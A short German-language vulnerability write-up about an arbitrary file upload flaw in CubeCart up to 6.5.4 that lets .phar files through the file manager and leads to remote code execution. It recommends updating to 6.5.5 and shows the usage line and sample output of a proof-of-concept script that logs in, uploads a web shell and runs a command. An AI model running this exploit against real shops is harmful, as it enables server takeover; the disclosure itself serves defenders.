
CubeCart <= 6.5.4 ist anfällig für einen beliebigen Dateiupload, der zu Remote Code Execution (RCE) führt.
CubeCart <= 6.5.4 ist anfällig für ein Problem mit beliebigem Datei-Upload, das zu Remote Code Execution (RCE) führt. Die Schwachstelle betrifft den Dateimanager der Anwendung und dessen Filter, indem sie Angreifern erlaubt, .phar-Dateien mit schädlichem Code hochzuladen. CubeCart sollte auf 6.5.5 aktualisiert werden, da dieses Update einen Sicherheitspatch zur Behebung dieser Schwachstelle enthält.
Weitere Einzelheiten finden Sie in der offiziellen Ankündigung von CubeCart in den Referenzen.
Ein automatisierter Proof-of-Concept (PoC) wurde erstellt, aber diese Schwachstelle kann auch manuell ausgenutzt werden, indem eine schädliche .phar-Datei über den Dateimanager hochgeladen wird.
So wird der PoC verwendet:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
Nach der Ausführung ist dies die erwartete Ausgabe für eine erfolgreiche Ausnutzung:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data